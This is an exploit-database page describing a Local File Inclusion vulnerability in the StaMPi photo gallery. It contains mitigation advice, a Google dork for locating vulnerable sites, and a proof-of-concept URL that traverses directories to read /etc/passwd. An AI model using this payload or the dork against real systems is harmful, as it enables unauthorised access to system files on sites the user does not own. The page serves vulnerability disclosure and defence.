header-logo
Suggest Exploit
vendor:
StaMPi
by:
e.V.E.L
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: StaMPi
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

StaMPi – Local File Inclusion

StaMPi is vulnerable to Local File Inclusion (LFI) attacks. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to the victim. The malicious URL contains a malicious file path which is then included in the application. This can lead to the disclosure of sensitive information such as the /etc/passwd file.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files. The application should also be configured to only include files from a specific directory.
Source

Exploit-DB raw data:

# Exploit Title: StaMPi -  Local File Inclusion
# Google Dork: "Designed by StaMPi" inurl:fotogalerie.php
# Date: 16/2/15
# Author : e . V . E . L
# Contact: waleed200955@hotmail.com



PoC:

http://site.com/path/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00

Navigation

Suggest Exploit

Services By CQR